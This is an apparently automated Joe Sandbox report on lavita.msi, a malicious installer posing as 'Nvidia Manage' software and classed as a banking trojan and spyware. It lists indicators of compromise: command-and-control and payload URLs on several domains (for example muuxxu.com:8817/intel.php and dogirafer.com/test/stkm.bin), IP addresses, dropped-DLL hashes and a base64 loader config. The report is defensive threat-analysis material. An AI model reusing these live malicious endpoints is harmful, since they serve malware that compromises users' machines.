                                            https://proliforetka.com/explorer.exe, 00000007.00000002.4615738228.000000000C3AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4614759735.000000000C081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4615738228.000000000C383000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4387418661.000000000C488000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4386958155.000000000C381000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4616007306.000000000C474000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4387199626.000000000C3A8000.00000004.00000001.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-hexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                              high
                                              https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-quexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
                                                https://wns.windows.com/eexplorer.exe, 00000007.00000003.4387068567.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4610617935.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2403423241.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2979103692.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  https://muuxxu.com:8817/intel.phpom:8817/intel.phpWCrundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://cronoze.com:8817/rundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://proliforetka.com/test/1explorer.exe, 00000007.00000002.4616007306.000000000C474000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://cronoze.com:8817/intel.phpCrundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://proliforetka.com/test/yexplorer.exe, 00000007.00000002.4614759735.000000000C354000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://r11.o.lencr.org0#rundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F434000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3349191347.000001DA034F3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3349400263.000001DA031D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4597607083.000001DA031D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F425000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    https://dogirafer.com/test/stkm.binDS&sexplorer.exe, 00000007.00000003.3457537830.000000000C3C8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://muuxxu.com:8817/pentium.phpgWrundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://muuxxu.com:8817/intel.phpCCrundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://proliforetka.com/_explorer.exe, 00000007.00000002.4615738228.000000000C383000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4386958155.000000000C381000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhzexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://cronoze.com:8817/intel.phpMrundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://excel.office.com-explorer.exe, 00000007.00000002.4614759735.000000000C081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2405576453.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://muuxxu.com:8817/intel.phpPCrundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&ocexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-darkexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AAexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              high
                                                              http://r11.i.lencr.org/0rundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F434000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3349191347.000001DA034F3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3349400263.000001DA031D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4597607083.000001DA031D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F425000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://dogirafer.com/files/stkm.binwexplorer.exe, 00000007.00000003.3457537830.000000000C3C8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://dogirafer.com/test/8085467_13561511323361_4058196URLS1https://proliforetka.com/test/775166_4explorer.exe, 00000007.00000003.3556892148.0000000008F60000.00000040.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://proliforetka.com/SIEexplorer.exe, 00000007.00000002.4616007306.000000000C474000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-cexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reveexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://muuxxu.com/rundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://dogirafer.com/est/explorer.exe, 00000007.00000002.4587902556.0000000000D99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://cronoze.com:8817/intel.phprundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://powerpoint.office.comEMdexplorer.exe, 00000007.00000000.2405576453.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4614759735.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.thawte.com/cps0/lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drfalse
                                                                      high
                                                                      https://android.notify.windows.com/iOSexplorer.exe, 00000007.00000000.2405576453.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://cronoze.com:8817/Mrundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://www.thawte.com/repository0Wlavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drfalse
                                                                          high
                                                                          https://outlook.comeexplorer.exe, 00000007.00000002.4614759735.000000000C081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2405576453.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nationexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000007.00000003.4387068567.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4610617935.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2403423241.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2979103692.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://dogirafer.com/test/t/explorer.exe, 00000007.00000002.4601098836.0000000002FBE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                https://www.advancedinstaller.comlavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://proliforetka.com/rexplorer.exe, 00000007.00000002.4615738228.000000000C3AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://api.msn.com/explorer.exe, 00000007.00000002.4606667288.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://proliforetka.com/uexplorer.exe, 00000007.00000002.4614759735.000000000C081000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://proliforetka.com/test/rexplorer.exe, 00000007.00000002.4614759735.000000000C354000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.msn.com:443/en-us/feedexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-eiexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.16.1 | dogirafer.com | United States | 13335 | CLOUDFLARENETUS | true
94.232.46.11 | muuxxu.com | Russian Federation | 44477 | WELLWEBNL | false
94.232.40.41 | cronoze.com | Russian Federation | 44477 | WELLWEBNL | false
172.67.161.60 | proliforetka.com | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1576900
Start date and time: 2024-12-17 17:54:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 47s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 41
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: lavita.msi
Detection: MAL
Classification: mal100.spre.bank.troj.spyw.evad.winMSI@62/24@5/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 12
• Number of non-executed functions: 201
Cookbook Comments:
• Found application associated with file extension: .msi
• Override analysis time to 240s for rundll32
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 2.22.50.144, 2.22.50.131, 13.107.246.63, 20.12.23.50
                                                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                            • Report size getting too big, too many NtOpenKey calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                            • VT rate limit hit for: lavita.msi
Time      Type             Description
11:55:28  API Interceptor  11628644x Sleep call for process: explorer.exe modified
11:57:22  API Interceptor  2x Sleep call for process: WMIC.exe modified
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):1403
                                                                                                                                Entropy (8bit):5.709973809083858
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:0lOg59dnZbnv68l9Ax939TlRpUXzSnISnoFPKybD4DhiSW6ESnISn5+OPzSnISnr:0ge9dtS8l9Ax939TlbblsPqD8SNlQ3lr
                                                                                                                                MD5:D8284FA67477F87A750BA60A8F79ACDC
                                                                                                                                SHA1:B1BF28AB3E5B1C6ED41D9C89985144B5E8F00A78
                                                                                                                                SHA-256:B9C2F1E667A6CF5B715A503ACD90F90D03A6DBA941A024BD023920995630E6A0
                                                                                                                                SHA-512:552F044D0A3FBC5996D04E24C4BA3491C5D699BE8070ECAF6675194BCC9449EFE81A9413DB9BBC355398B46B7071AEA660CEF90BC91D6E3D6623C84B3E2BDAD5
                                                                                                                                Malicious:false
                                                                                                                                Preview:...@IXOS.@.....@.^.Y.@.....@.....@.....@.....@.....@......&.{6526CBB4-D28A-4CBC-AF93-907FED1F0EB9}..Nvidia Manage..lavita.msi.@.....@..@..@.....@........&.{943AE3C8-CB21-42BD-93F4-79BEC1C03CE0}.....@.....@.....@.....@.......@.....@.....@.......@......Nvidia Manage......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{6526CBB4-D28A-4CBC-AF93-907FED1F0EB9}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{6526CBB4-D28A-4CBC-AF93-907FED1F0EB9}.@......&.{D674043B-F548-4EAE-B311-F2B735308BAE}&.{6526CBB4-D28A-4CBC-AF93-907FED1F0EB9}.@........CreateFolders..Creating folders..Folder: [1]#.B.C:\Users\user\AppData\Roaming\Nvidia Manage INC\Nvidia Manage\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..).C:\Users\user\AppData\Roaming\gpuset\....6.C:\Users\user\AppData\Roaming\gpuset\appgpuset.dll....WriteRegistryValues..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3954176
                                                                                                                                Entropy (8bit):6.141171944490726
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:uUhs9XR3wxZXRTZUcuVHleFPH1FBJtFfmHrgdvs+s9bj5ZDhN4q:SagbONF30blJ7B
                                                                                                                                MD5:4717C34252551071AA41C2881315A4B8
                                                                                                                                SHA1:B239D502A5C200E63D13730219F7272A8D9E0FE7
                                                                                                                                SHA-256:EA2C9E620D779449A2D5176ACE0C4993934E85BE7A0207F3F51B4A432627AD2F
                                                                                                                                SHA-512:2FDA6766651AE4A2BD766026FAB9410CCA738EC0099302AA962243B11C6CB80D432A50D94D6DDC085B23EB71576732BEA1ADF0B9B2F5D6A127E60066AB379564
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......#?U.g^;.g^;.g^;..:8.j^;..:?.|^;..:>..^;.t88.n^;.t8>..^;.t8?.D^;....f^;.....d^;...>.b^;.|..w^;....f^;.....e^;....z^;.g^:..^;.[9>.x^;.[9?.f^;.[9;.f^;.[9.f^;.[99.f^;.Richg^;.........PE..d...g|hf.........." ......%..>...............................................`>.....V.2...`A.........................................[/.X.....3.,.....3.<L...P1..}....2.(&....>.. ..px+.8...................8.+.(....x+...............3..............................text...Q.%.......%................. ..`.rdata.......0%..0....%.............@..@.data...P....`/..b...H/.............@....pdata......P1......./.............@..@.idata...3....3..4...P1.............@..@.gfids..$1...@3..2....1.............@..@.giats........3.......1.............@..@minATL..).....3.......1.............@..@.00cfg........3.......1.............@..@.tls..........3.......1.............@....rsrc...<L....3..N....1.
                                                                                                                                Process:C:\Windows\System32\rundll32.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):124
                                                                                                                                Entropy (8bit):5.26290707352349
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:BkWVm3BZwlzdWoqyduHUyPYt28oZWVm3DskVLLrci5gn:BkSABZwpIAduHrAt2DSADXVbT+n
                                                                                                                                MD5:3E6C698C1C0D0E14E4D6CB8B86CDF8C2
                                                                                                                                SHA1:C083376418AC326B82350C36A112E38A9EE7844B
                                                                                                                                SHA-256:E22E6D12379DA162DC5D5EC8DA0260C9A5C4DA860775DE35C20CC41B738DDC9B
                                                                                                                                SHA-512:C274385C323B388A57723B570C1E6BC051F45E637D9FC10CD26AC93E77F6CA47E5E64C586626A0C747626D91E2CB390AD17281736D4D47D5DE613B3DAC95D052
                                                                                                                                Malicious:false
                                                                                                                                Preview:{YXBwZ3B1c2V0LmRsbA==, IkM6XFVzZXJzXGVuZ2luZWVyXEFwcERhdGFcUm9hbWluZ1xncHVzZXRcYXBwZ3B1c2V0LmRsbCI=, MQ==, R2ZlWGNvZGVGdW5j}
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {943AE3C8-CB21-42BD-93F4-79BEC1C03CE0}, Number of Words: 10, Subject: Nvidia Manage, Author: Nvidia Manage INC, Name of Creating Application: Nvidia Manage, Template: ;1033, Comments: Create database IInlimited, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2416640
                                                                                                                                Entropy (8bit):7.734482900935259
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:XqfTYBZKumZr7A31su1uXZn8Ud9JCM5Rm5hfJYPYtwRXIhMRs:oYnK/AhuSyJN5RmjJvi4+
                                                                                                                                MD5:B4D82D17669303BE46EDBF7B7C5823A2
                                                                                                                                SHA1:1D8E902129F1BFBA8D349403B5D45A737D1372C3
                                                                                                                                SHA-256:F071F083770FE89D0860BA0CF46EDA960D3CCF31639A18DDA8954A0C026165D9
                                                                                                                                SHA-512:A97E93833D37C7E0D1F01A58A86CDC97DC8AB3CC2D7A0E458B158627FF61C625CDDBBEE8DAAACBE9EFAE3F413AFE5B605156C3A6803EF1A68FBFCD921A55DFF6
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...................%...................................D.......`......................................./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...............................................................................................................................................................................................................................................................................................................;...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...4...2...:...?...5...6...7...8...9...>...<.......=...........@...A...B...C...........F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):446944
                                                                                                                                Entropy (8bit):6.403916470886214
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Joe Sandbox View:
                                                                                                                                • Filename: 45c62e.msi, Detection: malicious, Browse
                                                                                                                                • Filename: Doc_21-04-53.js, Detection: malicious, Browse
                                                                                                                                • Filename: klog.php.msi, Detection: malicious, Browse
                                                                                                                                • Filename: Doc_21-04-53.js, Detection: malicious, Browse
                                                                                                                                • Filename: fes.msi, Detection: malicious, Browse
                                                                                                                                • Filename: zdi.txt.msi, Detection: malicious, Browse
                                                                                                                                • Filename: merd.msi, Detection: malicious, Browse
                                                                                                                                • Filename: medk.msi, Detection: malicious, Browse
                                                                                                                                • Filename: lavi.msi, Detection: malicious, Browse
                                                                                                                                • Filename: Document-v09-42-38.js, Detection: malicious, Browse
                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1804
                                                                                                                                Entropy (8bit):5.554938100823992
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:0xe9dt7LlAOlwhQlsP3IOXXL5D8SXld3l4e:0xert/lplAQlslXXlFlp
                                                                                                                                MD5:1C696A5241A9DD84D7D23755CE803529
                                                                                                                                SHA1:7845AA1FDC2161340B7131B56D2710ED941187C7
                                                                                                                                SHA-256:B91E8017168D360282B616B093E1648BD8CD1DC13CE9779F36C18BECEC22C5EF
                                                                                                                                SHA-512:12762C5EAFAAA50EB99E02E1C0D4658ED45EFA656B4EC31131515F324796EA3D911E643210AC8E253074B477215B793EC0C976E7D336F5E48D730FAB4607295A
                                                                                                                                Malicious:false
